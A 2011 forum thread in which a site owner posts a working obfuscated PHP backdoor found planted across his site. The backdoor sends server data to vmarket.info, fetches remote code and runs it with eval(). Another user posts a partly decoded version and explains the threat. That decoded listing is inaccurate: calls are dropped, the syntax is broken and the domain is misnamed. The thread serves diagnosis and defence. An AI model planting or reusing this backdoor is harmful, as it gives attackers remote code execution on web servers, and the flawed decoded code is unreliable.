1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

Trojan.Script.473810 at my site

Discussion in 'Security' started by Nick252, Nov 4, 2011.

0
  1. #1
    I noticed at my site at all folders there is a file with various name 116931.php, 12241.php,28822.php and all contain this code

    <? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("dm1hcmtldC5pbmZv");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="cd01c79da4a6f044165989be6a59818a") $f=$_REQUEST["id"];if($c=file_get_contents(base64_decode("aHR0cDovLzdhZHMu").$f.$z))eval($c);else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>
    Code (markup):

    i uploaded file at virutotal and i the result is Trojan.Script.473810 or PHP:Small-AH [Trj]

    anyone know how to fix this and how to decode the file?
     
    Nick252, Nov 4, 2011 IP
  2. DaringHost

    DaringHost Greenhorn

    Messages:
    50
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    18
    #2
    What type of website are you running?
    WordPress blogs are the most common software that I've seen hackers get into. If you are using WordPress and are using the latest version, I would checkout what plugins you are using. They have also been known to open doors for exploits.
     
    DaringHost, Nov 7, 2011 IP
  3. Just need it

    Just need it Active Member

    Messages:
    146
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    55
    #3
    well.. here is what your file contains actually:

    <?
	error_reporting(0);
	$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
	$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
	$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
	$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
	$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
	$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
	$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
	$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
	$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
	$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
	$z="/?".$a.".".$b.".".$c.".".$d.".".$e.".".$f.".".$g.".".$h.".e.".$i.".".$j;
	$f="vmarket.info";
	
	if (basename($c)==basename($i) && isset($_REQUEST["q"]) && md5($_REQUEST["q"])=="cd01c79da4a6f044165989be6a59818a")
		$f=$_REQUEST["id"];
	if($c="http://7ads.".$f.$z)
		eval($c);
		else if($c="http://7.".$f.$z))
			eval($c);
	else
	{
		$cu="http://71.".$f.$z);
		curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
		$o=curl_exec($cu);
		curl_close($cu);
		eval($o);
	};
	die();
 ?>
    PHP:
    As far as I have analysed the codes it is some kind of script that interact with a file hosted on vmarket.com and load up some codes from there and execute them locally. It also send out all the server information and can receive data from browser.
    It may be a simple script that loads up something useful and required, or It may be a dangerous script that loads some malicious codes and execute them locally on your server, either the case is I'll never want to have a backdoor on my server.
    After visiting the website vmarket.com I got to know about some spamming tactics, they guys over are fraud, if they cant code a file without introducing a backdoor then how do you think they can secure the backlink from your server, also who is responsible for legitimacy of all the information sent out and received ?
     
    Last edited: Nov 21, 2011
    Just need it, Nov 21, 2011 IP
  4. Nick252

    Nick252 Well-Known Member

    Messages:
    983
    Likes Received:
    19
    Best Answers:
    0
    Trophy Points:
    110
    #4
    thanks for your replies , i solved the problem by contacting host
     
    Nick252, Nov 22, 2011 IP